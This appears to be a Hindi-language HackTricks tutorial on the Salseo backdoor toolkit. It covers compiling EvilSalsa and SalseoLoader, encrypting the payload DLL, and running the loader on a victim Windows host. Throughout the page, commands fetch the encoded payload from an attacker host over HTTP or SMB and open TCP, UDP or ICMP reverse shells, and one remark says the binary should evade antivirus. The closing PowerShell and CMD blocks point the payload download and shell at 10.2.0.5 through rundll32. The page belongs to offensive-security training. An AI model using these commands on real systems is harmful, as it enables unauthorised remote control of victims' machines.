9.4 KiB
Salseo
{{#include ../banners/hacktricks-training.md}}
बाइनरी को संकलित करना
गिटहब से स्रोत कोड डाउनलोड करें और EvilSalsa और SalseoLoader को संकलित करें। आपको कोड संकलित करने के लिए Visual Studio स्थापित करने की आवश्यकता होगी।
उन परियोजनाओं को उस विंडोज बॉक्स की आर्किटेक्चर के लिए संकलित करें जहाँ आप उनका उपयोग करने जा रहे हैं (यदि विंडोज x64 का समर्थन करता है तो उन्हें उस आर्किटेक्चर के लिए संकलित करें)।
आप Visual Studio में बाएं "Build" टैब में "Platform Target" के अंदर आर्किटेक्चर का चयन कर सकते हैं।
(**यदि आप ये विकल्प नहीं पा रहे हैं तो "Project Tab" पर क्लिक करें और फिर "<Project Name> Properties" पर क्लिक करें)
फिर, दोनों परियोजनाओं का निर्माण करें (Build -> Build Solution) (लॉग के अंदर निष्पादन योग्य का पथ दिखाई देगा):
बैकडोर तैयार करें
सबसे पहले, आपको EvilSalsa.dll को एन्कोड करने की आवश्यकता होगी। ऐसा करने के लिए, आप पायथन स्क्रिप्ट encrypterassembly.py का उपयोग कर सकते हैं या आप परियोजना EncrypterAssembly को संकलित कर सकते हैं:
Python
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
विंडोज
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
ठीक है, अब आपके पास Salseo चीज़ को निष्पादित करने के लिए सब कुछ है: encoded EvilDalsa.dll और SalseoLoader का बाइनरी।
SalseoLoader.exe बाइनरी को मशीन पर अपलोड करें। उन्हें किसी भी AV द्वारा नहीं पहचाना जाना चाहिए...
बैकडोर निष्पादित करें
TCP रिवर्स शेल प्राप्त करना (HTTP के माध्यम से एन्कोडेड dll डाउनलोड करना)
याद रखें कि रिवर्स शेल लिस्नर के रूप में nc शुरू करें और एन्कोडेड evilsalsa को सर्व करने के लिए एक HTTP सर्वर शुरू करें।
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
UDP रिवर्स शेल प्राप्त करना (SMB के माध्यम से एन्कोडेड dll डाउनलोड करना)
याद रखें कि रिवर्स शेल श्रोता के रूप में एक nc शुरू करें, और एन्कोडेड evilsalsa (impacket-smbserver) को सेवा देने के लिए एक SMB सर्वर शुरू करें।
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
ICMP रिवर्स शेल प्राप्त करना (कोडित dll पहले से पीड़ित के अंदर)
इस बार आपको क्लाइंट में रिवर्स शेल प्राप्त करने के लिए एक विशेष उपकरण की आवश्यकता है। डाउनलोड करें: https://github.com/inquisb/icmpsh
ICMP उत्तर बंद करें:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
क्लाइंट को निष्पादित करें:
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
पीड़ित के अंदर, चलो salseo चीज़ को निष्पादित करते हैं:
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
SalseoLoader को DLL के रूप में संकलित करना जो मुख्य फ़ंक्शन को निर्यात करता है
SalseoLoader प्रोजेक्ट को Visual Studio में खोलें।
मुख्य फ़ंक्शन से पहले जोड़ें: [DllExport]
इस प्रोजेक्ट के लिए DllExport स्थापित करें
Tools --> NuGet Package Manager --> Manage NuGet Packages for Solution...
DllExport पैकेज के लिए खोजें (Browse टैब का उपयोग करते हुए), और Install दबाएं (और पॉपअप को स्वीकार करें)
आपके प्रोजेक्ट फ़ोल्डर में फ़ाइलें दिखाई दी हैं: DllExport.bat और DllExport_Configure.bat
Uninstall DllExport
Uninstall दबाएं (हाँ, यह अजीब है लेकिन मुझ पर विश्वास करें, यह आवश्यक है)
Visual Studio से बाहर निकलें और DllExport_configure निष्पादित करें
बस बाहर निकलें Visual Studio से
फिर, अपने SalseoLoader फ़ोल्डर में जाएं और DllExport_Configure.bat निष्पादित करें
x64 चुनें (यदि आप इसे x64 बॉक्स के अंदर उपयोग करने जा रहे हैं, तो यह मेरा मामला था), System.Runtime.InteropServices चुनें ( DllExport के लिए Namespace के अंदर) और Apply दबाएं
Visual Studio के साथ प्रोजेक्ट फिर से खोलें
[DllExport] अब त्रुटि के रूप में चिह्नित नहीं होना चाहिए
समाधान का निर्माण करें
Output Type = Class Library चुनें (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)
x64 प्लेटफ़ॉर्म चुनें (Project --> SalseoLoader Properties --> Build --> Platform target = x64)
समाधान का निर्माण करने के लिए: Build --> Build Solution (Output कंसोल के अंदर नए DLL का पथ दिखाई देगा)
उत्पन्न Dll का परीक्षण करें
Dll को उस स्थान पर कॉपी और पेस्ट करें जहाँ आप इसका परीक्षण करना चाहते हैं।
निष्पादित करें:
rundll32.exe SalseoLoader.dll,main
यदि कोई त्रुटि नहीं आती है, तो शायद आपके पास एक कार्यात्मक DLL है!!
DLL का उपयोग करके एक शेल प्राप्त करें
HTTP सर्वर का उपयोग करना न भूलें और एक nc श्रोता सेट करें
पॉवरशेल
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
CMD
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
{{#include ../banners/hacktricks-training.md}}









